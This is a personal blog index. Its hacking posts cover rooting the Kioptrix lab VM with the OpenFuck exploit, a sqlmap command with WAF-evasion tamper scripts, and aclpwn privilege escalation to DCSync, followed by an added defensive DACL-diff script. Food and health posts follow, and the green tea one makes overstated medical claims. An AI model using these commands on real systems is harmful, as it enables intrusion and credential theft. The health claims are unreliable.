
Blog

  • Practical Ethical Hacking Course Completed

    I just finished an amazing hacking course by TheCyberMentor on Udemy. It’s a great deal and provides a really practical introduction to pentesting by a professional. I highly recommend it. Woot!

  • Kioptrix Level 1 easy root

    I’m taking The Cyber Mentor’s Practical Ethical Hacking Course on Udemy, and during the scanning and enumeration chapter we started scanning Kioptrix Level 1. I’ve played around with Kioptrix before and was already prepared to root the machine in a quick two-step, even though that’s not part of the section. To do this root, you’ll need VMware Player to run Kioptrix Level 1, which you can download from VulnHub. Get it running and find the IP address. I had a little difficulty with this, as I couldn’t just pick it up with netdiscover on my network and had to do an nmap ping scan to discover hosts on my vmnet8 interface rather than my local network. Once I had the IP I poked around a bit, looked at the default webpage the server was hosting, ran dirbuster, etc., but really got into it running nikto. Although an nmap scan showed an SMB share hanging out, which is usually where I’d start probing, nikto showed this:

    Wait what? I can pop a shell? Let’s look up the vuln.

    Evidently these are way, way, way outdated versions of Apache and mod_ssl, with a vuln that goes back to 2002. Also, this sounds familiar: I’ve already exploited this on a box somewhere and have the exploit on my Kali box. For whatever reason this isn’t already implemented in Metasploit, but exploit code is available on Exploit-DB, and it’s called OpenFuck. Classy, I know. It’s in C and needs to be compiled with gcc to run, but I already had it from the last time I used it.

    ./OpenFuck 0x6b 172.16.XXX.XXX 443 -c 40

    And what do I get?

    Well I’m root already, no pivoting or privesc, just an easy rooted box. While I’m here I better grab some treasure.

    Hashes to crack for later! Fun!

  • sqlmap full scan plus tamper scripts to evade WAF

    Just a small note related to sqlmap culled from working on a CTF style challenge. Not all the tamper scripts in jhaddix’s helpful attack string are still working. Current working command:

    sqlmap -u http://192.168.1.1 --level=5 --risk=3 -a --text-only --technique=BU --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --random-agent

  • Escalating Privilege with ACLPWN.py

    On a recent hacking challenge I was presented with a privesc scenario where I had already compromised a low-privileged user with the tools available in Impacket. The user (a service account) had access to WinRM and therefore had a semi-functional shell, but no access to RDP or SMB shares. The network had a default installation of Exchange Server, which opens up some avenues for privesc, thanks to the research of dirkjanm and his tool aclpwn.py.

    aclpwn.py uses BloodHound, an Active Directory graphing tool, to identify paths and exploitation routes on a domain, and easily identifies the shortest path from any user to domain admin. aclpwn uses this graph and low-level credentials to abuse group memberships created by Exchange, specifically the Exchange Windows Permissions group, which for some reason has WriteDacl privileges in Active Directory environments. Now, my compromised service account wasn’t part of the group and had no WriteDacl permissions, but it could, under its own authority, create a new user and add it to the necessary group. After bashing the keyboard repeatedly trying to find a way to access the domain with this user, enter aclpwn. Usage is simple. On Kali, pip install aclpwn.

    aclpwn -f <target> -ft <target-type i.e. user | computer > -d <domain>

    You need your BloodHound instance running, and may need to supply its credentials:

    aclpwn -f <target> -ft <target-type i.e. user | computer > -d testsegment.local -du <database user> -dp <database password>

    Bang: aclpwn automatically gives your user the privileges needed to DCSync any or all accounts on the domain. Domain Admin hashes, dumped with Impacket: easy-peasy privesc.
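
    From the defender's side, the change this post describes shows up as new replication rights in the domain object's DACL. The following is an added example, not part of the original post or of aclpwn: it diffs two SDDL strings of that DACL and reports trustees that gained DCSync-relevant rights. The SIDs, the sample strings and the `EXPECTED` allowlist are constructed assumptions.

```python
import re

# Extended-right GUIDs that, held together on the domain object, permit DCSync.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Access-mask bits used when the rights field is hex instead of letter pairs.
MASK_BITS = {"CR": 0x100, "WD": 0x40000, "GA": 0x10000000}
# Assumption: trustees expected to hold these rights (built-in Administrators,
# Domain Controllers, Enterprise DCs, Enterprise read-only DCs). Tune per domain.
EXPECTED = {"BA", "DD", "ED", "RO"}

def rights_of(field):
    """Return the two-letter SDDL rights named in an ACE rights field."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {name for name, bit in MASK_BITS.items() if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}

def risky_grants(sddl):
    """Set of (trustee, finding) for allow ACEs that enable or lead to DCSync."""
    found = set()
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    for body in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        ace_type, _flags, rights, guid, _inherit, trustee = body.split(";")[:6]
        if ace_type not in ("A", "OA") or trustee in EXPECTED:
            continue
        granted = rights_of(rights)
        if granted & {"GA", "WD"}:  # trustee can rewrite the DACL itself
            found.add((trustee, "WriteDacl/FullControl"))
        if "CR" in granted and guid.lower() in REPL_RIGHTS:
            found.add((trustee, REPL_RIGHTS[guid.lower()]))
        elif "CR" in granted and not guid:  # CR without a GUID = every extended right
            found.add((trustee, "All-Extended-Rights"))
    return found

def new_grants(old_sddl, new_sddl):
    """Findings present after a DACL change that were absent before it."""
    return sorted(risky_grants(new_sddl) - risky_grants(old_sddl))

# Constructed sample with made-up SIDs: -1105 is a group holding WriteDacl,
# -1602 a newly created user that is granted both replication rights.
DOM = "S-1-5-21-1111-2222-3333"
BEFORE = ("O:BAG:BAD:AI(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
          f"(A;CI;RPWDLCLORC;;;{DOM}-1105)")
AFTER = BEFORE + "".join(f"(OA;;CR;{g};;{DOM}-1602)" for g in REPL_RIGHTS)
if __name__ == "__main__":
    print(new_grants(BEFORE, AFTER))
```

    `risky_grants(BEFORE)` on its own reports the standing WriteDacl holder, which is the precondition the post relies on and worth reviewing even before any change occurs.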

  • The Amazing Health Benefits of Green Tea

    By McKay Savage from London, UK [CC-BY-2.0 (http://creativecommons.org/licenses/by/2.0)], via Wikimedia Commons
    Green Tea may be the most beneficial addition to any and all holistic health regimens. It is certainly one of the easiest to add into a daily routine, and has been clinically proven to improve health in normal drinking concentrations. This superfood (or beverage) packs a wallop of anti-oxidants, as well as producing a number of health benefits outside the standard anti-cancer properties of fruits and vegetables.

    1. It is a brain booster. The well-known stimulant in tea, caffeine, has brain tonic effects, and can aid in focus, concentration, and energy. The lower dose of caffeine, in combination with L-theanine, an amino acid, can produce a mellow and relaxed buzz when compared to the jittery effects of coffee. L-theanine also stimulates the neurotransmitter GABA and can increase dopamine levels as well.
    2. Green tea fights cancer. Whether through anti-oxidants or through interactions of the complex chemistry of brewed tea leaves, studies have repeatedly shown that regular drinkers of green tea get less cancer. This is probably one of the main reasons that tea drinking spread through Asia, and for tea’s reputation there as a longevity elixir.
    3. Fat burning. While not all metabolism studies agree at this point, some have found a clear increase in energy production, with increased metabolism. What sets green tea apart in these studies is evidence that fat metabolism specifically accounts for most of the increase in energy.
    4. It kills bacteria and freshens breath. Tea has natural antibiotic properties which begin at the mouth and can pass through the digestive system and urinary tract. Green tea preparations have been used for centuries in Chinese medicine for their antiseptic properties.
    5. Heart Attack and Stroke. There is evidence that catechins in green tea lower cholesterol, especially LDL, so-called “bad” cholesterol. High cholesterol levels are definitely related to cardiovascular disease, and a cup of green tea is an easy addition to help lower risk factors.
    6. Blood Sugar and Diabetes. Tea consumption has been associated with a significantly lower risk of type 2 diabetes, alas, only for heavy tea drinkers. For normal consumers, though, tea can help lower blood sugar and increase sensitivity to naturally produced insulin, making the disease more manageable.

    For more information on the amazing benefits of green tea, check out this great article at Authority Nutrition, which includes lots of links to original studies, and details on some of the healthy compounds in tea.

  • The Philosophy of Healing Foods

    [Image: Epicurus, Pergamon Museum]

    Good food can heal. This is something we are all aware of instinctively, though we may not be able to describe how or why. The definitions of good food can vary as well, over time, across cultures, or depending on mood and situation. What is even less clear is what bad food is. What in our diet is making us ill, or at least contributing to the illness process? These answers are rarely simple, but newer developments in medical science are leading us in the right direction. According to recent, well-documented medical reports, stress and inflammation are the real culprits when looking at the disease process. From diabetes to stroke, heart attack and cancer, diseases attack the parts of the body damaged by stress and inflammation. Diet can exacerbate or even cause these bodily stresses, and lead to overall poor health, ruining our quality of life. And while an ounce of prevention is worth a pound of cure, dietary changes, and a focus on our food philosophy, can help reverse years of unhealthy diet and lifestyle choices. These changes aren’t miraculous, though the results might seem to be. Like most lifestyle changes, the results add up slowly over time, and are proven by a long and healthy life.

    A healing food philosophy starts with the realization that some parts of our food systems, and therefore our own diets, are sick. Identifying individual culprits is difficult, so making small changes regularly towards the long-term goal of health is easier than a radical food revolution in your own kitchen. Think about foods that you know are healthy for you personally, and try to include more of them in your diet. Start cutting out obvious problem foods as you can, but a positive focus on enjoyable meals helps reinforce good choices. Food production and preparation affect the food before you eat it. Despite all the media confusion about GMOs, pesticides, fertilizers, etc., it doesn’t make sense to put any more poison in your body than you have to. Whether these are small traces or not, why buy pre-poisoned food if organic is available? Add fresh foods and whole foods. Fresh foods taste better, are more vital, and force you to know what you are eating. They don’t have long lists of unpronounceable “ingredients,” and are generally what separates a good meal from a mediocre one. A big step for most of us is… Start Cooking More Often. It’s hard to wean oneself from convenience, but home-cooked food is easier to control, at least, and may become the foundation of a whole healthy lifestyle. Eat with loved ones. Have family meals, throw potlucks, have dinner parties. Wholesome food prepared lovingly is one of the greatest gifts we can give to people we care about. Healing with food is a social endeavor. A positive social environment lowers stress, and increases the enjoyment of the food prepared. Have fun with it. Epicurus, the philosopher pictured above, noted that enjoyment of food was inherently hedonistic, and yet necessary for the preservation of life. The enjoyment of good food, even fatty, high-calorie, or otherwise “naughty” foods, can contribute to health in myriad ways, if part of a conscious lifestyle of wellness and positive choices.

  • Magic Mushrooms

    Love them or (maybe) hate them, mushrooms have been renowned for centuries around the world for their flavor, beauty and health benefits. In Asia, varieties like reishi and maitake are valued for their contribution to longevity, while in the Occidental West, Morels, Truffles and even the lowly Crimini are being touted for everything from a blood pressure cure to anti-cancer wonder foods. While some finicky eaters may complain about the flavor or, more likely, the texture of mushrooms, with proper preparation even strongly flavored mushrooms can be added to familiar dishes, and become a staple of the home pantry.

    Some unfamiliar mushrooms can cause intestinal distress upon first encounter, so it is usually wise to introduce them into the diet slowly. In addition, making sure they are well cooked can minimize the negative impacts on digestion, and often wild mushrooms should be par-boiled before use.

    One signature dish I have used for years to introduce people to Morel mushrooms is a simple Linguini with Morel Cream Sauce. It is always served to rave reviews, and in fact I have had friends tell me they actually dream about this dish in springtime, when the mushroom hunting season begins.

    To begin this dish I start with about one pound of very fresh morels, which have been soaked in water to remove any forest duff or six-legged guests. These are drained and sliced into bite-sized pieces, along with one or two medium-sized shallots sliced into a thin julienne. The shallots are sauteed in butter until translucent, then the mushrooms are added and cooked until they begin to crisp and all liquid is reduced in the pan. Add two tablespoons of dry sherry and reduce again. Then add two cups of heavy cream. Let the whole sauce reduce over a very low simmer until the thickness can coat the back of a clean spoon, then finish with salt, a pinch of white pepper, and another small pinch of nutmeg. Serve over any favorite prepared pasta.

    The long caramelization of shallot and mushroom in this dish contributes a deep earthy flavor, and the texture of the small morel pieces pleases even avowed mushroom haters.

    Often, individuals who dislike mushrooms at first offer can be won over by simply sauteing any mushrooms in butter and garlic until crispy and serving them over steaks or adding them to sauces. The crispness and garlicky goodness overcome previous experiences of soggy, bland mushroom dishes. Otherwise, a long marinade in any vinaigrette before cooking can improve the flavor enough to win over the haters.